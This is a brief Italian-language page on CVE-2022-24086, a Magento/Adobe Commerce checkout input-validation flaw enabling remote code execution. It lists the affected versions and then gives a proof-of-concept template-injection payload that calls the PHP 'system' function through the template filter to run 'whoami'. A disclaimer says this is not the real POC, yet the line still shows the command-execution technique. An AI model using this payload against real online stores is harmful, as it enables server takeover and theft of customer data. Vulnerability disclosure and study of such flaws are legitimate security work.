
CVE-2022-24086 su Magento RCE
CVE-2022-24086 su Magento RCE
Le versioni di Adobe Commerce 2.4.3-p1 (e precedenti) e 2.3.7-p2 (e precedenti) sono interessate da una vulnerabilità di validazione dell'input impropria durante il processo di checkout. Lo sfruttamento di questo problema non richiede interazione da parte dell'utente e potrebbe portare all'esecuzione arbitraria di codice.
Attenzione: Questo non è il vero POC ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}